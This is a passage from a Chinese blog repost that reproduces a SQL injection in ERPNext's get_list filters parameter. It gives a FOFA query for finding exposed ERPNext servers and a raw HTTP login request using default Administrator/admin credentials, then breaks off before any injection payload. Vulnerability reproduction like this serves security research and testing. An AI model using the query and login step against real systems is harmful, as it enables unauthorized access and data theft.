当前位置: 首页 > article >正文

ERPNext SQL 注入漏洞复现

0x01 产品简介

 ERPNext 是一套开源的企业资源计划系统。

0x02 漏洞概述

 ERPNext 系统frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:app="ERPNext"

0x04 漏洞复现 

获取有效cookie

POST / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 52

cmd=login&usr=Administrator&pwd=admin&device=desktop

尝试注


http://www.kler.cn/a/157477.html

相关文章:

  • Mybatis中使用MySql触发器报错:You have an error in your SQL syntax; ‘DELIMITER $$
  • STM32 高级 物联网通信之CAN通讯
  • [创业之路-198]:华为的成立发展与新中国的建立与发展路径的相似性比较
  • 堆【Lecode_HOT100】
  • 中国新能源汽车公共充电桩数据合集(2002-2023年)
  • 腾讯云云开发 Copilot 深度探索与实战分享
  • 如何选择适合的香港服务器托管服务
  • vue计算排列布局
  • 西南科技大学模拟电子技术实验六(BJT电压串联负反馈放大电路)预习报告
  • 使用Java语言判断一个数据类型是奇数还是偶数
  • 新华三数字大赛复赛知识点 网络访问控制
  • JFrog----SBOM清单包含哪些:软件透明度的关键
  • sqlmap400报错问题解决
  • 未势能源亮相中国燃料电池汽车大会,助力京津冀“氢能高速”
  • 【Azure 架构师学习笔记】- Azure Databricks (1) - 环境搭建
  • Django回顾5 - 多表操作、其它字段和字段参数、中间表的三种创建方式
  • 国产API调试插件:Apipost-Helper
  • JVM Optimization Learning(五)
  • vue3使用vuex 集中式管理状态数据
  • 6、原型模式(Prototype Pattern,不常用)
  • 从遍历到A星寻路
  • 备忘录不小心删了怎么办?如何找回我的备忘录?
  • 加载预训练权重时不匹配
  • 数据库事务
  • C/C++ 原生套接字抓取FTP数据包
  • 【Cadence Allegro17.4】